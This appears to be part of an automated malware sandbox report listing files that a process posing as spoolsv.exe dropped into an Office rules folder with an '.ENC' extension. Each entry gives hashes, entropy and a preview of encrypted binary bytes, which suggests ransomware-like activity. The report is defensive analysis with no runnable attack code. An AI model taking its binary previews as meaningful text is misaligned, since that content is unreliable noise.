                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..B.:..PY...."..s...m.\:. .....!?'.N.3.......n%.Zb3E..m"....S.u.V...`C..'2.E.J....b6.U..'}%a$T....`........Z..|I...l&...j..&.s...'=.1..T........:m.....s.....r.Z.MFf@.v.5...J.&B..V*..d..Xnq.$d.k.....KC.l..v7....w.Q..........%s1...Y'... T2.yJ|s...|....D3..S/.....7.~../...:......)....b....<:Z1...6&.R.ij.x.........{'..h....."3..z.L........s..)...k....7V.R.j....;..."Y...u[.9...V.wg6q....=/.@Ts)....3.}.U.X. ...,@.9..T...,..\,.]w_....s.\X]..0..jb.:.2C.k...TK..E{mkJ.<..+..$...7g......6.~...G.....;....R...M.S;......Shd!..@....1.`....J..==...8.`..E.\..}..b..V.3.jq.*....a)......T......X:.."..M.4C...n....E5...xS..:.(...e...b....=X.GF....f.FU...O..*.3!eT.V;....f.u.0.\.I.s...l.G.. x..L..m.w.m...$..%.Qj.vJ....%....2J=MY.K:...5.R..Y,.).(.k.(.>0....({.(j......f.T..C..t.Q{.0..:].....$-7IqEv.78)..~.".%..7mw.jC:G[...73?w..e.|.....y..6.oh._D....}rgS>.N8]Y.@.;.0..2.w..m...:.......D..]....j.S+2.}.)..7.s.J..M......Y...6

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702401v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.847111032074007
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/42dRmN2iVVYLDAE3firXgxlATvGM9Lw1OH++gl7ixereubsyY6LxXWOpL:/4/UT/AUqExlATvGMFHfpxUeubXYuWOh
                                                                                                                                                                                                                                                      MD5:CCC9A3BEFD6D2E174A8B9F354B0BBC8F
                                                                                                                                                                                                                                                      SHA1:E42DA27E2526DD2B8ECE7A870F3C6947E0A4935F
                                                                                                                                                                                                                                                      SHA-256:A3B539863AE6B2BE738370DEE1502C9FDB5E356F8386B35CE97656A7957F8BEF
                                                                                                                                                                                                                                                      SHA-512:F144EC70D098C9E35CC52BE36A0009F1CCF341BD2F54ECFE83B71BA6866CE18040058F2C10A5034F788823CE51F45A0B912FD6519484CC01CAE7DECD4E38FEA9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...c}x..|R.m.l...,.j....3.c.H .'....I.U..=.>.1..W\...C...i..'...P..K..Q..}...7.=S.E..&.....4b.2h.T.a-o...`P5..U<.....6jm.....`:.Jd.D...p.wU..C.C...1.8%V*...Et".?.......E.Iy.`.. ..z...Z.....%../[c:$t0F^~.....@C.&...F6:l.\._.4......?..QH^..a.A..`o.7......d,.4n.....T..d.X..a.Qf%.mK.V..h.....%{c.>..O[..T... .6..d...g...U.\(..V..;t0..j....l.w!.._........h..9....m.r.._}K..0.qd.7f......p...^...n...4.AdRx......./.../.w..G...."......J..&t..].9....z.../]"4K.b^|<..q..d.u.p....u..C].}.7......*...i..$..f..p........X.K...YB.....=n1......G...,..'r..M.....;l.N...b../}.w%....s.....K..2.......n...Leh=.@D.G.uwS..Q.W.u- ..c...dx9..hw.uy...:..,.h...`m+.~..$M..8S.....}-..u.0..C.P<..D..%..^.Wq6...h*....(.p....B......{...L........7..l.w1.q.....Y....I.{...9.) .:.J.E._4U.T(.....0.RF..M..Ws...E.;8E.........._...0.'..l1.`&....M.X6.D(b.S...l~x..X*W]%.O.(("_j}`.rf^.,..-..>...f.u...W.[.%.....u.V.Y.+...i..5.n.w...).K6.o..C...?%..Y.7

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702450v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.861922455247108
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/f56MKU6+Xc+0fnbenjVTzKDZTyRw8m6Znc5HTGSFmPQYI4n:/B6MX6+Xc+8benjoxy68mOSFmPQo
                                                                                                                                                                                                                                                      MD5:1371AE4541CA720B58021D3CDA45CDAC
                                                                                                                                                                                                                                                      SHA1:8677D5C5A4B7949DB548C7E1F71A84C719905D19
                                                                                                                                                                                                                                                      SHA-256:ADCF9BAB51B8FC712462A7C4B5A25FA24C2EFEB27CA0CD6BFCB5F74B6CAF68A4
                                                                                                                                                                                                                                                      SHA-512:414DC6ED4CE5B8F5308FD74C5212EA97D28889E9533EA5AA5856E1D034F1AF86402F82DD0B046834515E070282A20A1788FA3946F218DEDAC03519D99132AA99
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....G..B.t....Z.E..}....g..Y.B.$.v..#.....s....<...p.K.......'j.6...i.~._8....).C.3nA.N9....0\. .A.({.+wzJ.Z4...MJ.3.vl..W6...u....=E...@!B[.e.C..+.........bf..ECH...I.....K...v..V9T+N.......]P.....R.OP!$.^..HsR...2....51f.Km..X....+......kd....nl....I....>._<.:=.bZB....v$CUJ...g\#.M.aL.%e.UO.._..Ak}:A|..<.VS3..K..dLp.4..1;N6.....vcB...p.%..|@..E..Qu.IA....;..f......:")......".L.#K.R.H..U.P....o.!.i.xJZga.SQ..H$.[ba...m.|<HvF......~.DA#[.....l8.rz..#.m.6.<}...q;k.pj...W)+..ss,HHY.o..E7._T..bT...:i{..$/....3.d..;22<~.zZ}l..u..t...4.....n...k'|..2.r.d.-...wbhp....)......9...e.^t.PZ ..q.21...q]..[..*n.o..v`H.........(..{K....7.*..2...7..Y.>.'..H...B.l...W.V..rm...H..Y.M.../j..0.95......^T...B. ......%.Rb......wPp..g.....Z>...[..z....v..os....,.+..E.%!Li.....P...<j/.4.W\...d...o.....!.Q]..4z....\n$.\o].8.(........cB.Q..-.C.|Z.D......#Mp...M=.).I....A..\t{-i.?..0l.s...AJ?zA.!21,.=.q......../.f.......#>.[..~~Eg.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702451v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.863643789962222
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/BbjkDTZHHbS02oQYLhJi6XcCcDV6Vbu+OXWdnXG5uk1o9PTL5wKJhpQcFut99Xr:/BPkDTD2whZXZcDV6RsGdnWHCL5wKJzG
                                                                                                                                                                                                                                                      MD5:AC9A7F63CC40B08188B521CBB2849462
                                                                                                                                                                                                                                                      SHA1:45A56D0828D53352E5DC52BA770752110FDCE048
                                                                                                                                                                                                                                                      SHA-256:87A215C320FC424F8E2E0F47E619B56E298CE010EF52E7920189D863ECAED90A
                                                                                                                                                                                                                                                      SHA-512:BAAE63D25827B4C24A4FE45229FE0A33772072F505AB5F7B767181044DADC5655C37FDDAB0A580784BBB3B358B87563FC373611B9687C53E043BF7013E285DC0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..y...../.D_..l..Bl...0...z..$lys...0F..8.S.|0..)...\.,`.D.7...P...~(D...Ev1>...B....k..|.;Q<...g...^.....j..i.^l......^x.,tm......m8.e|x.W."..g..g6.L.....Q.p.......>..j...)2.....?.2A~.Q......4}...6. .;........<4,}~H......5.o..@=.@....tKv.s.].)o..wY.9S....z.-..X........-tr[...e.FJO.3....$..:..6Aaw~.Ec^VZ.`..{.N.7..3.7..DP}.sL.......(....XBF......[-......0/J.7v.^...!0rW...F7.fX(...:.Z........|.....H...L(]..$.E...2F.V.o.U<g..4....2.=.v..m.t.M.].gG.1.-o.Xv...ZOt.4..".u8...]?E:...1x^.Q....\MU.{.l..C..M.%..F."^..L..m..W/T...qXF...*:hz...N3.i....vkX..D....}.8r.OI...L.W`...e...O,...(..^0Z...zJp...).]v...{.Zz....@....F.4fG.,.;a?b1C.P..x...._.R...ioOG(...4.X.._7.......F.......*...%8..wd -.B..w._.{....Y...........)A..{p}..V..-...)..?O...(.S#<...b...H..SL......\5c!.k...}....5....t...q...v.....b5./a..k..<'365|.....F.[.Z.....K^!$.!..F?. v.GQ\n.-.-.T.p...Y.{.xe1..y.0^#.......O........f.b)..".3A...#..Q.B.v..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702500v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.832758881319242
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/3wVfXamx68NpjdoW0N+uDu+V1ya583XNbxCaAUsrK8391N7:/gVfXamx6kkdV19Mbo7UsO8Dh
                                                                                                                                                                                                                                                      MD5:8CEDE426FA267730D75AC2F1B94F16B4
                                                                                                                                                                                                                                                      SHA1:3A27598B3E50AD678BA140B35B2D0FFD809A2512
                                                                                                                                                                                                                                                      SHA-256:670BB86D981335E16BC5A9525C1EAC7CEAF66E4CEDA2495B54CFCE8E8BEC2C7B
                                                                                                                                                                                                                                                      SHA-512:34D0CE766769597ECF6610CAEC5F49F88E7BFD9815A48B2883270D57DCF4CFD6E28E0C8C7241672D7FD0FD9B4924726F91827CE504FA3148318ADAE9397A5C44
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.a..2......L4KN........9......'..'.J.l+&.zX..9....R.....~..7M..R....a..`......*.1....f....C1y...m2.&.hwK6....!~1O....y....3...m..H..#...`o...|.*..1.VQ.A..$Y.".q.*..D_K!.2,.....).T'..i..x:G9b...`.{......W.?9..}}H.Zq...*|'.?....nw!)...a..y.9.M^..q.o....+......o..}>b]..Tq..9..f.hl."S.]Z............e..]]........"...*.......6.%Y...{...C. `F..G..O..f.c.ie.......#pV$..a..........3a..Yia.....n..........%.......jT...u"K...8_....v..~......;@d...+...<..8U..U......O.sN.y.4.c.......Ox....Y.....f.....8..b......N..uj.u..V.f.......ap..v.~.U,5.bu.w...E..A...v.Cc..G.h....Q{..Er-....Nq.....W...F..Vj.R.z..%D.?...:.-|3%8N.......%.#...r.p...^q..uA..*E...~..3....<.)...]Ua.C.;)....u..bS.8.....9.l 1.?....q......O..j.^.'|..)....<*E.o?....I.3....<....![.Mo..v..v..oi6..i$2......_6~r.....'.=..[..L.T.H.:-.u$...}...a...!`.j.......8J..?.N...eG.'./..v%V./....0f.-...c.......t0T....To(M. ...]A.......(1...F...d..M......-%

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.869316404926393
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/cHi+gZJ1KG+A3YeiO27ZG9wKFsYHLYNHe2nybukrfR3Mm9VoY0gLKpBN3dlG:/frZjKGnyZSF5YIzbBumBtLKBNo
                                                                                                                                                                                                                                                      MD5:3024084421D074F36C2F9EB51706AC53
                                                                                                                                                                                                                                                      SHA1:200DFE51DD404407E9539AF4452F2EDDAA97FC49
                                                                                                                                                                                                                                                      SHA-256:15A4D43F18C69D9C4E010CDCFCF57BAAB650FDD823C3F795536B4AE63AB2F5B0
                                                                                                                                                                                                                                                      SHA-512:9CCC50174039736CA2506F5AB6AF14462984251F011B9E7E509D4032E8CAD3B9D89AE55DD4C08AC5E60E522439933588E6E300C0896CCA5A726E9C26D09F0723
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..5.T..p..(....kj.3/....<..}..g.S...%...4M#.?.eo86N1.....d..L.|.U../.4_.H.BV...K6...i]....q^m...jH.3r...G.v..h....]]..~...?p..-..8.^3-.!.Q.p..^i.I....|d.....N..;VAy(.)...~Nk.n....m.r }.N...C.f....;.....P.).`..,.Ci.,)x.lW.\5.a<.8.(...K.kF.C_..S ..Wlda.../..ox......M..d.[,.S4........<..q.q.b..........b..1.u...V;0('....i...p;PK._...&~..^..d'...f......@Z w......$.\a. OX.Ni.OH...)..Z>6..e..v.R.....Nr%`...s./i.....ht...v.w.b.E....\a....[/?....4}....S......0......%.O.F.....f..H....).5..........6L{0...a..w .`..E....\.3..Q.\vvf....s..L. ..t.9.IR...,qN..!F..Jj..h.3...y.... .......x:l...;....dgX...s7.Hv{...."MS..Ii.....,c-....PU..7?.i*..V..9...D.>...f..=.)P....@hu.;....tNIc...T`....XS.=.s.0.. A}..K..\%.a..09......5Y..Eyf.K..<.Lb......(...K..2.ue.4-..,.|..'....>.X[^...FG........B...N,..!.dY....^...s#.....M..T..*..r.<S.3....DW..V<............v[....9I.o..'|..nI)..S.E$.<....4k.M..|....9x...5u...I..,.<.)G!.y.1

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.845997049326119
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Sr6edC2wyFDJ3sWek/8Eb5qesoDAV199caHhdorjprU/igPl1JVL:/SrBC2wyFDJ3UuVMesoDu6R4ig3HL
                                                                                                                                                                                                                                                      MD5:12F31FA9A47134F48CD0F3F0CA14444B
                                                                                                                                                                                                                                                      SHA1:B5FA2514F8B977DB93964FC665AF15E4F494226B
                                                                                                                                                                                                                                                      SHA-256:D006ED13FCF3569EEF8093DFF058A8E0FC62649AA3C809530817B547EEE23F91
                                                                                                                                                                                                                                                      SHA-512:90B4D863D6AB2BD025CB6A7F11761A03B28712C7C3092F4B9FE18BCC2093497B3FDBBA5C6C54F64D45F4E35FA1AACE66DC3EC6C4F2E39C0F37A64DEE7B564CE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.N..m.O.d...}...Z.p....s<.vp.....9#\.S....&4.=K@...rqNA.Kl...H.Ui(U....?A.x...OTk...b..`...~....!..........Mp. ...pL......de0..j...:...%.'.y......l)..J...<..U].'(4.....(.....b."...........Rf.....,.[4t...u.thS0v..,.D...ds.sG...@1....Y..Z.j.:..*..3t.......UU..R.h1.y.d?.W.r$..x>u.....wT.Mi2.&@.....'...Af..B.......y.?e.&o.:..+{"...h1...PF...y..M..+.o-1..}S..7iA.._.tY.C.J.0"..|.c..AD..(2....m.zA~lv..o.2...]..|.b...k..x-..%^7...ZP.%..T..o<. E)..... ...3./n.jDO.`..ty7].>.4.R..5V%..m.1.OSb..g...;.L.......FS..\LM.d.%..3\..#.|...'..1B'C^....a..AD.m]F'......f.e.|p./...TMU9.cA...0...<r.U...S...e*W.>J!]..5...5..VY.u...v.....M.....c..+.D....$..N>......]o..p...;..$..7.I8.c......g1.....\s .D1.!}.V.{..z79.O.1..U.h.S.{{t...iM...8.2.sg..a<...yS-...U'gKgtIc..y=.1Bn..0...7.y$.6..9.PE...._.m*=...hi.([....& ....g.#CT..'..$+..nZ...FP....-..$..1...V.Y..2.*1..u.....E?.Q..U..7.q.&..8JbL..B........Z.2..(.. E|N..s.....F.S

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.878763751217984
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/7CmUBoX53Lxtgec7tiyVJdX4otRm890l7hvfPnCoZ1A4wI3fYk5IgcEJI0bZRuj:/y+tgex+JZ1vm8WVPCoWacWI0bTuj
                                                                                                                                                                                                                                                      MD5:79F2B319B78163031341608638AA3C99
                                                                                                                                                                                                                                                      SHA1:C17E1699CD7CF2559693C5D93A500CEC1B6ACB18
                                                                                                                                                                                                                                                      SHA-256:2E7EB2C17049E3902B6D6A3D7E75CF66AF9590F2B3B44692818801DD984AE894
                                                                                                                                                                                                                                                      SHA-512:DFA3A28004E77B759894ECDB3C34ACD9F219E25B467024AA8E29CABCD80863E6B10DBD04ED0EF8C34388C6603686B551816A644438859473463F9F18FEEE62E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...8V{e......2.6..$./a[......ud'......x..>.$....'./XB_.......r..j"..{7..iX.1..W...I..jo.....q:f...I-..6.4.}K..E..ra..'....B.LM$3..z\.FH.#....-z.?.....C :.'..7.V.....S..0.ENt...cK.\..VQ.s=......!..Iu....>.....$..e..b..,...;.C0..5...tQ,.p...n+.......B..cY.......5.....]..qw.["......k....#.Ht{5}..oc.&.rU@&0`.Qr\.%..4..J..hO;.../..<ld..^....x...fN.>...u......xmO..D?Z#.$.Q.H....Q[E.O=..e1..O.5&............6.u......Mg..{.}.D.x....z;...... J.0.\...AE.....+.>]....g...@...38..."..u.\...........9.0L../..q,...ozP.lY..2Y.L..;T}..x.........PY......;U.jU...1....J?.i. ...A."8./]D:B.v..)....<.....?....,..S....t.d...}....@.(..4..`.....r.....m.X<..b....O.]n..c,D....M../5.p..2.......2...qK_.ub...P.[U...n.E.....$.U.#.....N...x.~.l.>.J..#'>y.K....$3i.D...YN........f"..a..].;g.M.....f;..Z..>...N.R......8r.P......%),..O.R-@.Z.J.R.Y........R.3.}L5qD.tF.1..{I.K...c.(.....#.z.}1..b...:......<..R.pL.!.)e.K...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702600v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.868659554599194
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/NFzGQGu5iAfFj2wMFuPNtmDFxgAX5CM0keyKjfIEE0EUWHx:/PzGvFA9aDWAFxgg5CMTe/AR0EUWR
                                                                                                                                                                                                                                                      MD5:4F9C7E85E27DEC884E270BE51D2E418A
                                                                                                                                                                                                                                                      SHA1:E8D36D7E95B1412D7F953540B9F4991EDF77507B
                                                                                                                                                                                                                                                      SHA-256:00CEB778F5531204FD109EC3B95C7B4B292367232C7548B47842C1D7A89B3430
                                                                                                                                                                                                                                                      SHA-512:96A8E596EE47B3EFF313899CE590CF491FA330AEC9B0B2C702438389B763CA6728DA76DF6A8D958F0E87B2C1EBC1A60ED0CC13169F566CEEDA60DEEF5249CE36
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t./.w,.I...lj.~..S.....'.2b..)Z...[...*....L.J...].._>.M!.7..WHrQ'j..|......D...`.]..6:..W.T.n.?f.|..?8...i.."={.>.&Fq.m...:.>..Z.Ul......._....C...+e.VSH.....W&.h.<[....s...~=.......%.w.X.$.QX..Q....l..w{..[..9....r.J="@.5Ye.7...Ig..EM...l.}h....J...oh..3F`....^]..R62a..YN)...C./..r...X...I.^.<....P.U.Z..P..LH.[.o..T^9...T.Y.-e..3.f*<....=l.......`..A.0..K........f..x...s...p *..XHn....O.._R..@o..:......m}+..z$.Y......pL...[....d...Bo.x..=..y.5........i.......Q:..w.-.0.j....Q.. l..8T.o$......e.~.gFuM..#..Z.<g.....M.R]..o.lZ.v..A..Te...a..F};9b.....V....P..[g...m.]Gc8Y..U9..3v..D..)cO.q...{-...R.H........r..U..;Y.2.T.._..B.`G.Q.}.(..m.....}.K.m......D.j.....v...9S.8...aC.x........`.....=...M.......L.Ml..f.h..?.._..sU.._..e..'d..|..!...Ks.........[l.k..n`..C.[.....'[1WM...DJ.?.jj.U.t.f.0..f@....P.r0...<.....ci....A........7.jyn"A.}...t.F...pb...q.3pZ=O.=....&....!.zR...........4X

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702601v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.865457911104184
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/r8uk+dyYPGOQXBiX6zf30hVKQVZWRULzipGAWnmAdMxL2/GDWvngNuJZ1omWpM0:/YTusOiBiX6zfbQVYRULAGMAdCL2+Kv+
                                                                                                                                                                                                                                                      MD5:7E4BEF31E1103BFF6683D37B23FE950F
                                                                                                                                                                                                                                                      SHA1:4773EA2E2557E36E0BEB23E86425EEA30C56CE41
                                                                                                                                                                                                                                                      SHA-256:D33C2BD266627CAE3EA13342C3D31FE3219C8A33C32F5A704EDFEAD2C595FDB7
                                                                                                                                                                                                                                                      SHA-512:18E02CD4B3F1A5AFA05BB9883BD718652DE2F93B96E7B930F9299BD9E6AB0B1E6F4B3C77C9F1EBAA83EBAA4100BC72CF4FA13868B66E26C0FA382DFAEF343013
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..;s..\..A\s.pG.Nk...A.....v.G...o...$j...;).}(...>.'..v....>A.%.}..Fc..P[.......C.....G6..>6.:6.......xcb.e.Cd.d0'iP..}..].\....5fY.qZ/..^...=mk.2%......q....v..Y.m.ir..p..x..oeG!hM0H.woJ.....Q.e..SH$..'U...!....2.......9M... .?r......A..q.d{...7k..j}M-.a..K.b..O..(.;..t/.z.1.tu .D.Pi(B.'..hp..2.....T..M......*?".....4.'K^....j...`X...J.....8%...7Y...%5..?..@.`.n ..j!...p7'O...Y.~:4..p{f.W[I.V3s."..e+M.....j.....l.(.....]=.W.....4}...Ne...................?.1..&....9.a.,.uFb..-8..&.J<.q...p...../V.!....9W..("Jv[oD]<..!..HZu.vqk.......co.....M.-I(eL.%JgL..`.O....,.....3.A,..R.\.0.?S>V.1.ra.qo...0...zT.M.;.}_..Y%\..|.r.....j..;c.d;.^...F.Q...}...{>.....V....\.....p..W....l....*\.$...u.........g....+......Y#^..o.N..v..j#.bJ`.w,../.E.."....0.K.8ta..'.....+../?.;..w..n....]*.am;.0.H.W.....L,@@.g}!...F...;...P.7.n..e.zt.....2.. q."..5<.K.b....C...u..0...g...N.F.AS.g[....ac. E....l'..u.e,.IT........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.837264582013054
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/AVCK/Dm0JGHC1FiiRUTGcnweYgR4t6XNyol/RG7WjUn6WQb2VrA2hfFn:/AEK7WHCXBRijmt6Yk50WjU6WQb222L
                                                                                                                                                                                                                                                      MD5:9B1544068425094EEE31E88690CD14CD
                                                                                                                                                                                                                                                      SHA1:613974705AD7461A3EF9E73AE74BDCCC85CD5F31
                                                                                                                                                                                                                                                      SHA-256:6EBA00D2B3ABF41EBE657D458CD0B2063FB1788E2631501656EC6A560419AFC3
                                                                                                                                                                                                                                                      SHA-512:60CF5363223B6DC629982BD5D169E122A0018941CEA26E641650CC11039D535457A223A54BF395B7359AB6B99DB67B25A098DE69AB734311AF721AD5B0781216
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..A.c..(.k.5....r..T.C......$.*.WU$@gm....SP]....(....bj..lTx.r1.p.`w.(..8Ml.v..=K........%;.!.....?....x.%S.[z.K...9>.3&Z...O..0.....:.>..P$\.p....r.3T.J..?.......K..*...._.5.....X..)j...L.T.;..v....mWg..%&%..u...JN.yi.F}S<DN[........y...$.{.....=..D|....N.....^....`c .).s.fk..k..<..,.^.b..cZ.|......N.1<U...d.d.......-..._pA... 0&.7QK..{.e.r%...2.E..A.c)..P..tv.-.8...........i.$(v-..+~....&Kj.I.N..OV.Z0..kf{T..}'.?9&.s.@yN.P#...8..!..UO.D8..T$vU..!-..r.T.A.....&........w....E$n.yY..LF...I....b...+.R..=p$....\.-xg.O...Z!pC..7{_.M..j6...]$r..K^......z..`.....1...1.Y.-......1...G.j..a..".w'...X;.,7.2~.......4fe...c....2....,....c.~...6.<F.=.:hg.lU.x}...B|FQ...N.@...L...<.......N.M......H.}%;.O......C.;...8y... ......s6.T...8yi.....?.cx1-|.9..e.......~!.`....3...8Y".....r....O.6M....1..?.@_....Sq..U*C..5..&[n....c..c.3D;xVUO..8b.dD.xZ.Y..[.........WR(.e....dt.....[@......b.A.m.z..;...r.nM}.....O

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.869495907446456
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/OtpmQSkB2OUF0prvmxa+gwIcjG8WvTWgivU/mg5y1/9JGU2UvunlI:/OKhCUFavmtgHHJji+5yLJGUvunS
                                                                                                                                                                                                                                                      MD5:CDCA8E395F877A474FEE98F12D7C22DC
                                                                                                                                                                                                                                                      SHA1:2FF730F1A85AE3DBDC6F41B0CC5F5A3E395D5564
                                                                                                                                                                                                                                                      SHA-256:B229FD917DE6A2BD85F939530B3249A3D5F04BC9BC2857CEB3524943D551101E
                                                                                                                                                                                                                                                      SHA-512:EB1F9EFE840F973A4344D6BA84CF18C15ED500E1CA193E91C845492BB79F5FDA2BFB8C2AB1C24213BE03827AC43A96658523C4126C31C65BFE0A8EDCB405E342
                                                                                                                                                                                                                                                      Malicious:false
